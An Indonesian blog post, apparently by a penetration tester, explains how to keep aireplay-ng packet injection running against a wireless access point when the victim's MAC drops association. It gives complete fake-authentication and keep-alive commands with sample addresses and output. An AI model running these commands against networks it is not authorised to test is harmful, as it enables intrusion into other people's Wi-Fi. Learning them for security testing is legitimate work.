Pernah ketemu kasus seperti ini ketika lagi asik-asiknya menginjeksi paket di jaringan wireless?

Saving ARP requests in replay_arp-0123-104950.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 17915 packets (got 3 ARP requests), sent 5854 packets...

Yup, kasus tersebut terjadi karena alamat MAC korban tidak lagi berasosiasi dengan Access Point setempat atau bisa dibilang lagi putus-putus, entah akibat proses de-authentication yang kita buat sendiri atau memang sinyalnya ga bagus untuk sampai di laptop/pc korban. Nah, untuk menyiasatinya ada 3 cara:

  1. Ganti dengan alamat MAC korban yang lain.
  2. Pancing dengan 1 kartu jaringan wireless lain (musti ada 2 buah kartu jaringan)
  3. Bikin fake authentication ke AP

Untuk cara yang pertama cukup mudah, tinggal matikan proses aireplay-ng yang sedang berjalan, lalu ganti dengan alamat MAC korban yang tergabung dalam satu AP yang sama. Pada cara yang kedua, kita tinggal menghidupkan kartu jaringan yang kedua (biasanya PCMCIA/USB card) lalu kirimkan paket ke AP atau cukup dengan mengirimkan ping ke internet. Yang mau saya bahas disini adalah cara ketiga, yaitu dengan membuat fake authentication ke AP, caranya:

aireplay-ng -1 0 -e  -a  -h  wifi0
aireplay-ng -1 0 -e linksys -a 00:18:F8:E1:76:BD -h 00:0F:54:3C:65:93 wifi0
Kalau sukses akan terlihat seperti ini:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful ๐Ÿ™‚

Atau dengan cara lain untuk keep-alive packet injection seperti ini:

aireplay-ng -1 6000 -o 1 -q 10 -e linksys -a 00:18:F8:E1:76:BD
-h 00:0F:54:3C:65:93 wifi0

yang berarti:

  • 6000 – Melakukan re-autentikasi setiap 6000 detik.
  • -o 1 – Hanya mengirim satu paket untuk satu waktu.
  • -q 10 – Mengirim paket keep-alive setiap 10 detik.

hasilnya akan seperti ini:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful ๐Ÿ™‚
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# dan seterusnya.

Selanjutnya kita bisa melanjutkan proses injeksi paket di jaringan wireless tersebut dengan santai ^^

About the Author modpr0be

Thomas Gregory (modpr0be) saat ini adalah direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation. Saya sering memberikan konsultasi tentang strategi keamanan kepada investor, mitra, dan pelanggan. Di sela-sela pekerjaannya, penulis memberikan materi dalam bentuk pelatihan dan kontribusi komunitas dalam bentuk seminar, workshop, dan diskusi dengan berbagai topik seperti teknik peretasan, teknik eksploitasi, dan analisis intrusi. Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini saya memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE). Jika ingin menghubungi saya dapat melalui email di tom at spentera dot id.

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google

You are commenting using your Google account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d blogger menyukai ini: